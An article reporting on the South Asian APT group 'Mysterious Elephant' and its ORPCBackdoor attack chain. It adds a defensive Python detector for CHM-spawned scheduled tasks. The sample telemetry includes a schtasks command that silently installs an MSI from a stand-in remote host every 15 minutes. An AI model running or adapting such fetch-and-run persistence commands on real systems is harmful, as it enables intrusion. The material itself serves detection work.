Unraveling A New South Asia-Based APT Group
Researchers at Knownsec 404 have attributed the 'ORPCBackdoor' backdoor they discovered to an emerging threat group tracked as 'Mysterious Elephant' or 'APT-K-47.' The attribution was established by correlating ORPCBackdoor with Kaspersky's research on Mysterious Elephant, confirming that the backdoors identified by both research and intelligence teams are the same. Mysterious Elephant has been active since March 2022, targeting various organizations with a focus on entities located in Pakistan. Its attacks begin with a phishing email carrying an archive file that contains weaponized attachments such as an RTF or CHM file. The report walks through the multi-stage chain that follows execution of the CHM file: a scheduled task is created for persistence and runs every 15 minutes, and it downloads and executes a second-stage MSI file, which contains ORPCBackdoor and establishes command and control (C2) communication.
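The persistence step in that chain (a scheduled task registered right after a CHM file is opened, repeating every 15 minutes and running an MSI install) is the kind of pattern a detection engineer can hunt for in process-creation telemetry. The following is an added example written for this page, not code from the Knownsec 404 report or from the group's tooling. It assumes the CHM is opened by the Windows help viewer hh.exe and that the task is registered with schtasks.exe; neither detail is stated in the article, and the Sysmon-style events it runs over are constructed for the demonstration.

```python
"""Flag CHM-spawned, high-frequency scheduled tasks that fetch an MSI.

Added example, not from the Knownsec 404 report. Assumptions (not stated in
the article): the CHM viewer is hh.exe and the task is created via schtasks.exe.
The events below are constructed, Sysmon-style process-creation records.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


CHM_VIEWER = "hh.exe"        # assumed handler for .chm files
TASK_TOOL = "schtasks.exe"   # assumed task-registration binary
MAX_MINUTES = 15             # repeat interval reported in the article

# Constructed sample telemetry: a CHM viewer spawns cmd.exe, which registers a
# task that repeats every 15 minutes and runs msiexec against a remote MSI.
# The last event is a benign daily backup task used as a negative case.
SAMPLE_EVENTS = [
    ProcEvent(400, 300, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(500, 400, r"C:\Windows\hh.exe",
              r'"C:\Windows\hh.exe" C:\Users\user\Downloads\invoice.chm'),
    ProcEvent(600, 500, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "start.bat"'),
    ProcEvent(700, 600, r"C:\Windows\System32\schtasks.exe",
              'schtasks /create /sc minute /mo 15 /tn "WinUpdate" '
              '/tr "msiexec /i http://example.invalid/update.msi /qn" /f'),
    ProcEvent(800, 400, r"C:\Windows\System32\schtasks.exe",
              "schtasks /create /sc daily /tn Backup /tr backup.exe"),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(events, pid):
    """Yield the parent chain of `pid`, nearest parent first."""
    by_pid = {e.pid: e for e in events}
    seen = set()
    cur = by_pid.get(pid)
    while cur and cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        yield cur


def parse_schtasks(cmdline: str):
    """Extract /sc, /mo and /tr from a `schtasks /create` command line, or None."""
    if not re.search(r"\bschtasks(\.exe)?\b.*\s/create\b", cmdline, re.I):
        return None
    sc = re.search(r"/sc\s+(\w+)", cmdline, re.I)
    mo = re.search(r"/mo\s+(\d+)", cmdline, re.I)
    tr = re.search(r'/tr\s+(".*?"|\S+)', cmdline, re.I)
    return {
        "sc": sc.group(1).lower() if sc else None,
        "mo": int(mo.group(1)) if mo else None,
        "tr": tr.group(1).strip('"') if tr else "",
    }


def find_chm_persistence(events):
    """Return alerts for schtasks events matching at least two of three signals."""
    alerts = []
    for ev in events:
        if _basename(ev.image) != TASK_TOOL:
            continue
        task = parse_schtasks(ev.cmdline)
        if task is None:
            continue
        reasons = []
        if any(_basename(a.image) == CHM_VIEWER for a in ancestors(events, ev.pid)):
            reasons.append("task registered from a CHM viewer process tree")
        if task["sc"] == "minute" and task["mo"] is not None and task["mo"] <= MAX_MINUTES:
            reasons.append(f"high-frequency repeat every {task['mo']} min")
        if re.search(r"\bmsiexec\b.*\bhttps?://", task["tr"], re.I):
            reasons.append("task action installs an MSI fetched from a URL")
        if len(reasons) >= 2:
            alerts.append({"pid": ev.pid, "cmdline": ev.cmdline, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_chm_persistence(SAMPLE_EVENTS):
        print(alert["pid"], "->", "; ".join(alert["reasons"]))
```

Requiring two of the three signals keeps a lone short-interval task or a lone MSI install from paging anyone, while the full chain (CHM ancestry plus a 15-minute repeat plus a remote MSI action) scores on all three; the parent-chain walk is what ties the task back to the document that spawned it.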
In examining the group's attack chain and the code structure of its weaponized payloads, the Knownsec 404 team uncovered notable similarities with other South Asian APT groups, most notably BITTER (MITRE ID: G1002). According to Knownsec 404's report, "CHM files are almost the same in terms of code logic, functions and evasion techniques, the subsequent second-order files downloaded are MSI files." This observation underscores the potential for shared assets among APT organizations, which complicates accurate attribution. Knownsec 404 asserts that based on their "analysis of other South Asian organizations SideWinder, Patchwork, CNC, Confucius, BITTER, and APT-K-47," their intelligence team sees "that these hacker organizations may be different groups under a unified organization, and there are many overlapping situations in terms of attack tools, attack targets, and network assets."